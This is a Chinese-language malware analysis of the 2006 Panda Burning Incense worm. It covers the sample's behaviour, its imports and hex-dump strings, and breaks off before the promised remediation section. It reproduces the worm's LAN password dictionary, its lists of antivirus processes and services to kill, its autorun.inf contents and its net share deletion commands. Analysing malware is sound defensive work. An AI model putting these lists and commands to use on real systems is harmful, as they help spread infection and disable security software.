熊猫烧香病毒技术分析及应急解决方案

熊猫烧香病毒技术分析及应急解决方案

BY Delphiscn(http://blog.csdn.net/delphiscn)cnBlaster#hotmail.com

目录
A.简介
B.样本分析
C.病毒特征及行为
D.反编译及源代码分析
E.解决方案

A.简介
2006年12月初,一个以熊猫烧香图像为标记的诡异病毒现身网络,使近千家企业的计算机遭到感染,个人用户更是不计其数。中毒的途径主要还是某些网站被植入病毒,而用户一旦登录这些网站,则很有可能触发病毒文件。熊猫烧香病毒不但可以对用户系统进行破坏,导致大量应用软件无法使用,而且还可以删除文件,造成用户的系统备份丢失,甚至无法进行系统恢复;同时该病毒还能自动终止大量反病毒软件的进程,大大降低用户系统的安全性。

B.样本分析
Name:setup.exe
Type: Worm
File size:22886 Bytes
MD5:9749216A37D57CF4B2E528C027252062
Environment:Borland Delphi 6.0-7.0 & UPack
Systems Affected:Windows 98/ME, Windows 2000/NT, Windows XP, Windows 2003

C.病毒特征及行为

病毒特征
1.关闭众多杀毒软件和安全工具
2.循环遍历磁盘目录、感染文件(包括移动存储设备),对关键系统文件跳过,不做处理
3.感染所有EXE、SCR、PIF、COM文件,并更改图标为熊猫烧香
4.感染所有.htm/.html/.asp/.php/.jsp/.aspx文件,添加木马恶意代码
5.自动删除*.gho文件,阻止用户通过GHOST进行数据修复

病毒行为
1.拷贝文件
病毒运行后,会把自己拷贝到
C:\WINDOWS\System32\Drivers\spoclsv.exe

2.添加注册表自启动
病毒会添加自启动项
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

3.每隔1秒寻找桌面窗口,并关闭窗口标题中含有以下字符的程序
天网防火墙进程
VirusScan
网镖杀毒
毒霸
瑞星
江民
黄山IE
超级兔子
优化大师
木马克星
木马清道夫
木馬清道夫
系统配置实用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
qqKav
qqAV
qq病毒注册表编辑器
Windows 任务管理器
小沈q盗杀手
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
PJF(ustc)
IceSword(使用的键盘映射的方法关闭安全软件IceSword )

4.每隔18秒
点击病毒作者指定的网页,并用命令行检查系统中是否存在共享
共存在的话就运行net share命令关闭admin$共享

5.每隔10秒
下载病毒作者指定的文件,并用命令行检查系统中是否存在共享
共存在的话就运行net share命令关闭admin$共享

6.每隔6秒
删除安全软件在注册表中的键值
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RavTask
KvMonXP
kav
KAVPersonal50
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStartEXE
YLive.exe
yassistse
修改以下值不显示隐藏文件
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue -> 0x00

7.终止系统中以下的进程
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe

8.删除以下启动项
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting
ServiceSOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

9.终止以下服务
kavsvc
AVP
AVPkavsvc
McAfeeFramework
McShield
McTaskManager
McAfeeFramework McShield
McTaskManager
navapsvc
KVWSC
KVSrvXP
KVWSC
KVSrvXP
Schedule
sharedaccess
RsCCenter
RsRavMon
RsCCenter
RsRavMon
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec
Core LC
NPFMntor
MskService
FireSvc

10.搜索感染除以下目录外的所有.EXE/.SCR/.PIF/.COM文件,并记有标记(同时删除所有.GHO文件)
WINDOWS
Winnt
System Volume Information
Recycled
Windows NT
Windows Update
Windows Media Player
Outlook Express
Internet Explorer
NetMeeting
Common Files
ComPlus
Applications
Messenger
InstallShield Installation Information
MSN
Microsoft Frontpage
Movie Maker
MSN Gamin Zone

11.添加自身至以下启动位置
\Documents and Settings\All Users\Start Menu\Programs\Startup\
\Documents and Settings\All Users\「开始」菜单\程序\启动\
\WINDOWS\Start Menu\Programs\Startup\
\WINNT\Profiles\All Users\Start Menu\Programs\Startup\

12.监视记录qq和访问局域网文件记录至c:\test.txt,并试图用qq消息传送

13.试图用以下口令访问感染局域网文件(GameSetup.exe)
1234
password
6969
harley
123456
golf
pussy
mustang
1111
shadow
1313
fish
5150
7777
qwerty
baseball
2112
letmein
12345678
12345
ccc
admin
5201314
qq520
1
12
123
1234567
123456789
654321
54321
111
000000
abc
pw
11111111
88888888
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
520
super
123asd
0
ihavenopass
godblessyou
enable
xp
2002
2003
2600
alpha
110
111111
121212
123123
1234qwer
123abc
007
aaaa
patrick
pat
administrator
root
sex
god
foobar
secrettest
test123
temp
temp123
win
pc
asdf
pwd
qwer yxcv
zxcv
home
xxx
owner
login
Login
pw123
love
mypc
mypc123
admin123
mypass
mypass123
901100
Administrator
Guest
admin
Root

14.所有根目录及移动存储生成如下安装配置文件
X:\setup.exe
X:\autorun.inf
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

15.删除隐藏共享
cmd.exe /c net share $ /del /y
cmd.exe /c net share admin$ /del /y
cmd.exe /c net share IPC$ /del /y

16.创建启动项:
Software\Microsoft\Windows\CurrentVersion\Run
svcshare=指向\%system32%\drivers\spoclsv.exe

17.禁用文件夹隐藏选项
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue

D.反编译及源代码分析
利用W32dsm打开已脱壳的setup.exe 可以从中分析蠕虫PE文件的具体信息。

**********************反汇编setup.exe********************************
Disassembly of File: E:\setup.exe *反汇编名称:setup.exe
Code Offset = 00000400, Code Size = 0000C800 *代码偏移量:00000400, 代码大小=0000C800
Data Offset = 0000CC00, Data Size = 00000400 *数据偏移量:0000CC00,数据大小=00000400

Number of Objects = 0008 (dec), Imagebase = 00400000h
*对象共计=0008 (dec) , 基地址=00400000h

Object01: CODE RVA: 00001000 Offset: 00000400 Size: 0000C800 Flags: 60000020
Object02: DATA RVA: 0000E000 Offset: 0000CC00 Size: 00000400 Flags: C0000040
Object03: BSS RVA: 0000F000 Offset: 0000D000 Size: 00000000 Flags: C0000000
Object04: .idata RVA: 00010000 Offset: 0000D000 Size: 00000E00 Flags: C0000040
Object05: .tls RVA: 00011000 Offset: 0000DE00 Size: 00000000 Flags: C0000000
Object06: .rdata RVA: 00012000 Offset: 0000DE00 Size: 00000200 Flags: 50000040
Object07: .reloc RVA: 00013000 Offset: 0000E000 Size: 00000C00 Flags: 50000040
Object08: .rsrc RVA: 00014000 Offset: 0000EC00 Size: 00000A00 Flags: 50000040

*Object01: CODE 相对虚拟地址: 00001000 偏移量: 00000400 大小: 0000C800 标记位: 60000020
*Object02: DATA 相对虚拟地址: 0000E000 偏移量: 0000CC00 大小: 00000400 标记位: C0000040
*Object03: BSS 相对虚拟地址: 0000F000 偏移量: 0000D000 大小: 00000000 标记位: C0000000
*Object04: .idata 相对虚拟地址: 00010000 偏移量: 0000D000 大小: 00000E00 标记位: C0000040
*Object05: .tls 相对虚拟地址: 00011000 偏移量: 0000DE00 大小: 00000000 标记位: C0000000
*Object06: .rdata 相对虚拟地址: 00012000 偏移量: 0000DE00 大小: 00000200 标记位: 50000040
*Object07: .reloc 相对虚拟地址: 00013000 偏移量: 0000E000 大小: 00000C00 标记位: 50000040
*Object08: .rsrc 相对虚拟地址: 00014000 偏移量: 0000EC00 大小: 00000A00 标记位: 50000040

Tip: *后面的内容为解释部分,仅供参考。
*******************************************************************

可以从以上的数据中获取蠕虫在内存中执行的数据,该蠕虫PE文件共分为4个区块,分别为text、bss、data、idata。熊猫烧香病毒运行时,共调用14个dll模块,125个Win32 API函数。14个DLL模块分别为kernel32.dll、user32.dll、advapi32.dll、oleaut32.dll、kernel32.dll、advapi32.dll、kernel32.dll、mpr.dll、user32.dll、wsock32.dll、wininet.dll、advapi32.dll、netapi32.dll、URLMON.DLL,125个Win32 API函数请参照以下反汇编数据。

+++++++++++++++++++ 导入函数 ++++++++++++++++++
Number of Imported Modules = 14 (decimal)

Import Module 001: kernel32.dll
Import Module 002: user32.dll
Import Module 003: advapi32.dll
Import Module 004: oleaut32.dll
Import Module 005: kernel32.dll
Import Module 006: advapi32.dll
Import Module 007: kernel32.dll
Import Module 008: mpr.dll
Import Module 009: user32.dll
Import Module 010: wsock32.dll
Import Module 011: wininet.dll
Import Module 012: advapi32.dll
Import Module 013: netapi32.dll
Import Module 014: URLMON.DLL

+++++++++++++++++++ 重要模块资料 +++++++++++++++

Import Module 001: kernel32.dll

Addr:00010366 hint(0000) Name: DeleteCriticalSection
Addr:0001037E hint(0000) Name: LeaveCriticalSection
Addr:00010396 hint(0000) Name: EnterCriticalSection
Addr:000103AE hint(0000) Name: InitializeCriticalSection
Addr:000103CA hint(0000) Name: VirtualFree
Addr:000103D8 hint(0000) Name: VirtualAlloc
Addr:000103E8 hint(0000) Name: LocalFree
Addr:000103F4 hint(0000) Name: LocalAlloc
Addr:00010402 hint(0000) Name: GetTickCount
Addr:00010412 hint(0000) Name: QueryPerformanceCounter
Addr:0001042C hint(0000) Name: GetVersion
Addr:0001043A hint(0000) Name: GetCurrentThreadId
Addr:00010450 hint(0000) Name: WideCharToMultiByte
Addr:00010466 hint(0000) Name: MultiByteToWideChar
Addr:0001047C hint(0000) Name: GetThreadLocale
Addr:0001048E hint(0000) Name: GetStartupInfoA
Addr:000104A0 hint(0000) Name: GetModuleFileNameA
Addr:000104B6 hint(0000) Name: GetLocaleInfoA
Addr:000104C8 hint(0000) Name: GetLastError
Addr:000104D8 hint(0000) Name: GetCommandLineA
Addr:000104EA hint(0000) Name: FreeLibrary
Addr:000104F8 hint(0000) Name: ExitProcess
Addr:00010506 hint(0000) Name: CreateThread
Addr:00010516 hint(0000) Name: WriteFile
Addr:00010522 hint(0000) Name: UnhandledExceptionFilter
Addr:0001053E hint(0000) Name: SetFilePointer
Addr:00010550 hint(0000) Name: SetEndOfFile
Addr:00010560 hint(0000) Name: RtlUnwind
Addr:0001056C hint(0000) Name: ReadFile
Addr:00010578 hint(0000) Name: RaiseException
Addr:0001058A hint(0000) Name: GetStdHandle
Addr:0001059A hint(0000) Name: GetFileSize
Addr:000105A8 hint(0000) Name: GetFileType
Addr:000105B6 hint(0000) Name: CreateFileA
Addr:000105C4 hint(0000) Name: CloseHandle

Import Module 002: user32.dll

Addr:000105DE hint(0000) Name: GetKeyboardType
Addr:000105F0 hint(0000) Name: MessageBoxA
Addr:000105FE hint(0000) Name: CharNextA

Import Module 003: advapi32.dll

Addr:00010618 hint(0000) Name: RegQueryValueExA
Addr:0001062C hint(0000) Name: RegOpenKeyExA
Addr:0001063C hint(0000) Name: RegCloseKey

Import Module 004: oleaut32.dll

Addr:00010658 hint(0000) Name: SysFreeString
Addr:00010668 hint(0000) Name: SysAllocStringLen

Import Module 005: kernel32.dll

Addr:0001068A hint(0000) Name: TlsSetValue
Addr:00010698 hint(0000) Name: TlsGetValue
Addr:000106A6 hint(0000) Name: LocalAlloc
Addr:000106B4 hint(0000) Name: GetModuleHandleA

Import Module 006: advapi32.dll

Addr:000106D6 hint(0000) Name: RegSetValueExA
Addr:000106E8 hint(0000) Name: RegOpenKeyExA
Addr:000106F8 hint(0000) Name: RegDeleteValueA
Addr:0001070A hint(0000) Name: RegCreateKeyExA
Addr:0001071C hint(0000) Name: RegCloseKey
Addr:0001072A hint(0000) Name: OpenProcessToken
Addr:0001073E hint(0000) Name: LookupPrivilegeValueA
Addr:00010756 hint(0000) Name: AdjustTokenPrivileges

Import Module 007: kernel32.dll

Addr:0001077C hint(0000) Name: WriteFile
Addr:00010788 hint(0000) Name: WinExec
Addr:00010792 hint(0000) Name: TerminateProcess
Addr:000107A6 hint(0000) Name: Sleep
Addr:000107AE hint(0000) Name: SetFilePointer
Addr:000107C0 hint(0000) Name: SetFileAttributesA
Addr:000107D6 hint(0000) Name: OpenProcess
Addr:000107E4 hint(0000) Name: LoadLibraryA
Addr:000107F4 hint(0000) Name: GetWindowsDirectoryA
Addr:0001080C hint(0000) Name: GetVersionExA
Addr:0001081C hint(0000) Name: GetTempPathA
Addr:0001082C hint(0000) Name: GetSystemDirectoryA
Addr:00010842 hint(0000) Name: GetProcAddress
Addr:00010854 hint(0000) Name: GetModuleHandleA
Addr:00010868 hint(0000) Name: GetModuleFileNameA
Addr:0001087E hint(0000) Name: GetLocalTime
Addr:0001088E hint(0000) Name: GetLastError
Addr:0001089E hint(0000) Name: GetFileAttributesA
Addr:000108B4 hint(0000) Name: GetDriveTypeA
Addr:000108C4 hint(0000) Name: GetCurrentProcess
Addr:000108D8 hint(0000) Name: FreeLibrary
Addr:000108E6 hint(0000) Name: FindNextFileA
Addr:000108F6 hint(0000) Name: FindFirstFileA
Addr:00010908 hint(0000) Name: FindClose
Addr:00010914 hint(0000) Name: FileTimeToLocalFileTime
Addr:0001092E hint(0000) Name: FileTimeToDosDateTime
Addr:00010946 hint(0000) Name: ExitProcess
Addr:00010954 hint(0000) Name: DeleteFileA
Addr:00010962 hint(0000) Name: CreateThread
Addr:00010972 hint(0000) Name: CreateFileA
Addr:00010980 hint(0000) Name: CopyFileA
Addr:0001098C hint(0000) Name: CompareStringA
Addr:0001099E hint(0000) Name: CloseHandle

Import Module 008: mpr.dll

Addr:000109B4 hint(0000) Name: WNetCancelConnectionA
Addr:000109CC hint(0000) Name: WNetAddConnection2A

Import Module 009: user32.dll

Addr:000109EE hint(0000) Name: keybd_event
Addr:000109FC hint(0000) Name: SetTimer
Addr:00010A08 hint(0000) Name: PostMessageA
Addr:00010A18 hint(0000) Name: MapVirtualKeyA
Addr:00010A2A hint(0000) Name: KillTimer
Addr:00010A36 hint(0000) Name: GetWindowTextA
Addr:00010A48 hint(0000) Name: GetMessageA
Addr:00010A56 hint(0000) Name: GetDesktopWindow
Addr:00010A6A hint(0000) Name: FindWindowExA
Addr:00010A7A hint(0000) Name: FindWindowA
Addr:00010A88 hint(0000) Name: DispatchMessageA
Addr:00010A9C hint(0000) Name: CharUpperBuffA

Import Module 010: wsock32.dll

Addr:00010ABA hint(0000) Name: WSACleanup
Addr:00010AC8 hint(0000) Name: WSAStartup
Addr:00010AD6 hint(0000) Name: gethostname
Addr:00010AE4 hint(0000) Name: gethostbyname
Addr:00010AF4 hint(0000) Name: socket
Addr:00010AFE hint(0000) Name: inet_ntoa
Addr:00010B0A hint(0000) Name: inet_addr
Addr:00010B16 hint(0000) Name: htons
Addr:00010B1E hint(0000) Name: connect
Addr:00010B28 hint(0000) Name: closesocket

Import Module 011: wininet.dll

Addr:00010B42 hint(0000) Name: InternetGetConnectedState
Addr:00010B5E hint(0000) Name: InternetReadFile
Addr:00010B72 hint(0000) Name: InternetOpenUrlA
Addr:00010B86 hint(0000) Name: InternetOpenA
Addr:00010B96 hint(0000) Name: InternetCloseHandle

Import Module 012: advapi32.dll

Addr:00010BBA hint(0000) Name: OpenServiceA
Addr:00010BCA hint(0000) Name: OpenSCManagerA
Addr:00010BDC hint(0000) Name: DeleteService
Addr:00010BEC hint(0000) Name: ControlService
Addr:00010BFE hint(0000) Name: CloseServiceHandle

Import Module 013: netapi32.dll

Addr:00010C22 hint(0000) Name: NetRemoteTOD
Addr:00010C32 hint(0000) Name: NetScheduleJobAdd

Import Module 014: URLMON.DLL

Addr:00010C52 hint(0000) Name: URLDownloadToFileA

+++++++++++++++++++ 导出函数 ++++++++++++++++++
Number of Exported Functions = 0000 (decimal)


看完以上的Win32 API函数,你也许就明白了蠕虫发作时会执行的一些动作。接下来我们再用WinHEX看看蠕虫文件的十六进制代码。

****************************************************************
B8 D0 D0 BB B0 AC C2 EA 2C 6D 6F 70 65 72 79 B6 D4 B4 CB C4 BE C2

ED B5 C4 B9 D8 D7 A2

*利用WinHEX查看十六进制码,发现偏移为0000C9D0的十六进制的ASCII转换为明文为

感谢艾玛,mopery对此木马的关注
****************************************************************
B7 C0 BB F0 C7 BD 00 00 FF FF FF FF 04 00 00 00 BD F8 B3 CC 00 00 00 00

FF FF FF FF 09 00 00 00 56 69 72 75 73 53 63 61 6E 00 00 00 FF FF FF FF

05 00 00 00 4E 4F 44 33 32 00 00 00 FF FF FF FF 04 00 00 00 CD F8 EF DA

00 00 00 00 FF FF FF FF 04 00 00 00 C9 B1 B6 BE 00 00 00 00 FF FF FF FF

04 00 00 00 B6 BE B0 D4 00 00 00 00 FF FF FF FF 04 00 00 00 C8 F0 D0 C7

00 00 00 00 FF FF FF FF 04 00 00 00 BD AD C3 F1 00 00 00 00 FF FF FF FF

08 00 00 00 B3 AC BC B6 CD C3 D7 D3 00 00 00 00 FF FF FF FF 08 00 00 00

D3 C5 BB AF B4 F3 CA A6 00 00 00 00 FF FF FF FF 0A 00 00 00 C4 BE C2 ED

C7 E5 B5 C0 B7 F2 00 00 FF FF FF FF 0A 00 00 00 C4 BE F1 52 C7 E5 B5 C0

B7 F2 00 00 FF FF FF FF 0E 00 00 00 BF A8 B0 CD CB B9 BB F9 B7 B4 B2 A1

B6 BE 00 00 FF FF FF FF 12 00 00 00 53 79 6D 61 6E 74 65 63 20 41 6E 74

69 56 69 72 75 73 00 00 FF FF FF FF 04 00 00 00 44 75 62 61 00 00 00 00

FF FF FF FF 0C 00 00 00 65 73 74 65 65 6D 20 70 72 6F 63 73 00 00 00 00

FF FF FF FF 06 00 00 00 C2 CC D3 A5 50 43 00 00 FF FF FF FF 08 00 00 00

C3 DC C2 EB B7 C0 B5 C1 00 00 00 00 FF FF FF FF 06 00 00 00 CA C9 BE FA

CC E5 00 00 FF FF FF FF 0E 00 00 00 C4 BE C2 ED B8 A8 D6 FA B2 E9 D5 D2

C6 F7 00 00 FF FF FF FF 15 00 00 00 53 79 73 74 65 6D 20 53 61 66 65 74

79 20 4D 6F 6E 69 74 6F 72 00 00 00 FF FF FF FF 13 00 00 00 57 72 61 70

70 65 64 20 67 69 66 74 20 4B 69 6C 6C 65 72 00 FF FF FF FF 0E 00 00 00

57 69 6E 73 6F 63 6B 20 45 78 70 65 72 74 00 00 FF FF FF FF 10 00 00 00

D3 CE CF B7 C4 BE C2 ED BC EC B2 E2 B4 F3 CA A6 00 00 00 00 FF FF FF FF

08 00 00 00 B3 AC BC B6 D1 B2 BE AF 00 00

*利用WinHEX查看十六进制码,发现偏移为00005EC0的十六进制的ASCII转换为明文为

天网防火墙进程
VirusScan
网镖杀毒
毒霸
瑞星
江民
超级兔子
优化大师
木马克星
木马清道夫
木馬清道夫
卡巴斯基反病毒
Symantec AntiVirus
Duba
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
超级巡警

*病毒运行时会关闭窗口标题中含有以上字符的程序

****************************************************************
00 00 00 00 FF FF FF FF 0C 00 00 00 4D 63 73 68 69 65 6C 64 2E 65 78 65 00 00 00 00 FF FF FF FF

0C 00 00 00 56 73 54 73 6B 4D 67 72 2E 65 78 65 00 00 00 00 FF FF FF FF 0C 00 00 00 6E 61 50 72

64 4D 67 72 2E 65 78 65 00 00 00 00 FF FF FF FF 0D 00 00 00 55 70 64 61 74 65 72 55 49 2E 65 78

65 00 00 00 FF FF FF FF 09 00 00 00 54 42 4D 6F 6E 2E 65 78 65 00 00 00 FF FF FF FF 0A 00 00 00

73 63 61 6E 33 32 2E 65 78 65 00 00 FF FF FF FF 0B 00 00 00 52 61 76 6D 6F 6E 64 2E 65 78 65 00

FF FF FF FF 0B 00 00 00 43 43 65 6E 74 65 72 2E 65 78 65 00 FF FF FF FF 0B 00 00 00 52 61 76 54

61 73 6B 2E 65 78 65 00 FF FF FF FF 07 00 00 00 52 61 76 2E 65 78 65 00 FF FF FF FF 0A 00 00 00

52 61 76 6D 6F 6E 2E 65 78 65 00 00 FF FF FF FF 0B 00 00 00 52 61 76 6D 6F 6E 44 2E 65 78 65 00

FF FF FF FF 0B 00 00 00 52 61 76 53 74 75 62 2E 65 78 65 00 FF FF FF FF 08 00 00 00 4B 56 58 50

2E 6B 78 70 00 00 00 00 FF FF FF FF 0B 00 00 00 4B 76 4D 6F 6E 58 50 2E 6B 78 70 00 FF FF FF FF

0C 00 00 00 4B 56 43 65 6E 74 65 72 2E 6B 78 70 00 00 00 00 FF FF FF FF 0B 00 00 00 4B 56 53 72

76 58 50 2E 65 78 65 00 FF FF FF FF 0A 00 00 00 4B 52 65 67 45 78 2E 65 78 65 00 00 FF FF FF FF

0A 00 00 00 55 49 48 6F 73 74 2E 65 78 65 00 00 FF FF FF FF 0B 00 00 00 54 72 6F 6A 44 69 65 2E

6B 78 70 00 FF FF FF FF 0D 00 00 00 46 72 6F 67 41 67 65 6E 74 2E 65 78 65 00 00 00 FF FF FF FF

0A 00 00 00 4C 6F 67 6F 31 5F 2E 65 78 65 00 00 FF FF FF FF 0A 00 00 00 4C 6F 67 6F 5F 31 2E 65

78 65 00 00 FF FF FF FF 0C 00 00 00 52 75 6E 64 6C 31 33 32 2E 65 78 65 00 00 00 00 FF FF FF FF

0B 00 00 00 72 65 67 65 64 69 74 2E 65 78 65 00 FF FF FF FF 0C 00 00 00 6D 73 63 6F 6E 66 69 67

2E 65 78 65 00 00 00 00 FF FF FF FF 0B 00 00 00 74 61 73 6B 6D 67 72 2E 65 78 65 00

*利用WinHEX查看十六进制码,发现偏移为00006100的十六进制的ASCII转换为明文为

Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
regedit.exe
msconfig.exe
taskmgr.exe

*病毒运行时会终止系统中以上程序的进程

****************************************************************
FF FF FF FF 00 00 00 00 FF FF FF FF 35 00 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F

66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 5C 52 61

76 54 61 73 6B 00 00 00 FF FF FF FF 05 00 00 00 4B 56 57 53 43 00 00 00 FF FF FF FF 07 00 00 00

4B 56 53 72 76 58 50 00 4B 56 57 53 43 00 00 00 4B 56 53 72 76 58 50 00 FF FF FF FF 35 00 00 00

53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65

6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 5C 4B 76 4D 6F 6E 58 50 00 00 00 FF FF FF FF 06 00 00 00

6B 61 76 73 76 63 00 00 FF FF FF FF 03 00 00 00 41 56 50 00 41 56 50 00 6B 61 76 73 76 63 00 00

FF FF FF FF 31 00 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F

77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 5C 6B 61 76 00 00 00 FF FF FF FF

3B 00 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43

75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 5C 4B 41 56 50 65 72 73 6F 6E 61 6C 35 30 00

FF FF FF FF 0F 00 00 00 4D 63 41 66 65 65 46 72 61 6D 65 77 6F 72 6B 00 FF FF FF FF 08 00 00 00

4D 63 53 68 69 65 6C 64 00 00 00 00 FF FF FF FF 0D 00 00 00 4D 63 54 61 73 6B 4D 61 6E 61 67 65

72 00 00 00 4D 63 41 66 65 65 46 72 61 6D 65 77 6F 72 6B 00 4D 63 53 68 69 65 6C 64 00 00 00 00

4D 63 54 61 73 6B 4D 61 6E 61 67 65 72 00 00 00 FF FF FF FF 3D 00 00 00 53 4F 46 54 57 41 52 45

5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F

6E 5C 52 75 6E 5C 4D 63 41 66 65 65 55 70 64 61 74 65 72 55 49 00 00 00 FF FF FF FF 58 00 00 00

53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65

6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 5C 4E 65 74 77 6F 72 6B 20 41 73 73 6F 63 69 61 74 65 73

20 45 72 72 6F 72 20 52 65 70 6F 72 74 69 6E 67 20 53 65 72 76 69 63 65 00 00 00 00 FF FF FF FF

37 00 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43

75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 5C 53 68 53 74 61 74 45 58 45 00 6E 61 76 61

70 73 76 63 00 00 00 00 77 73 63 73 76 63 00 00 4B 50 66 77 53 76 63 00 53 4E 44 53 72 76 63 00

63 63 50 72 6F 78 79 00 63 63 45 76 74 4D 67 72 00 00 00 00 63 63 53 65 74 4D 67 72 00 00 00 00

53 50 42 42 43 53 76 63 00 00 00 00 53 79 6D 61 6E 74 65 63 20 43 6F 72 65 20 4C 43 00 00 00 00

4E 50 46 4D 6E 74 6F 72 00 00 00 00 4D 73 6B 53 65 72 76 69 63 65 00 00 46 69 72 65 53 76 63 00

FF FF FF FF 37 00 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F

77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 5C 59 4C 69 76 65 2E 65 78 65 00

FF FF FF FF 37 00 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F

77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 5C 79 61 73 73 69 73 74 73 65 00

*利用WinHEX查看十六进制码,发现偏移为00006580的十六进制的ASCII转换为明文为

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting
ServiceSOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

****************************************************************
01 00 00 00 5C 00 00 00 FF FF FF FF 3E 00 00 00 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53

65 74 74 69 6E 67 73 5C 41 6C 6C 20 55 73 65 72 73 5C 53 74 61 72 74 20 4D 65 6E 75 5C 50 72 6F

67 72 61 6D 73 5C 53 74 61 72 74 75 70 5C 00 00 FF FF FF FF 39 00 00 00 5C 44 6F 63 75 6D 65 6E

74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 6C 6C 20 55 73 65 72 73 5C A1 B8 BF AA CA BC

A1 B9 B2 CB B5 A5 5C B3 CC D0 F2 5C C6 F4 B6 AF 5C 00 00 00 FF FF FF FF 25 00 00 00 5C 57 49 4E

44 4F 57 53 5C 53 74 61 72 74 20 4D 65 6E 75 5C 50 72 6F 67 72 61 6D 73 5C 53 74 61 72 74 75 70

5C 00 00 00 FF FF FF FF 36 00 00 00 5C 57 49 4E 4E 54 5C 50 72 6F 66 69 6C 65 73 5C 41 6C 6C 20

55 73 65 72 73 5C 53 74 61 72 74 20 4D 65 6E 75 5C 50 72 6F 67 72 61 6D 73 5C 53 74 61 72 74 75

70 5C 00 00 55 8B EC B9 0E 00 00 00 6A 00 6A 00

*利用WinHEX查看十六进制码,发现偏移为00009E60的十六进制的ASCII转换为明文为

\Documents and Settings\All Users\Start Menu\Programs\Startup\
\Documents and Settings\All Users\「开始」菜单\程序\启动\
\WINDOWS\Start Menu\Programs\Startup\
\WINNT\Profiles\All Users\Start Menu\Programs\Startup\

*病毒运行时添加自身至以上启动位置

****************************************************************
15 00 00 00 63 6D 64 2E 65 78 65 20 2F 63 20 6E 65 74 20 73 68 61 72 65 20 00 00 00 FF FF FF FF

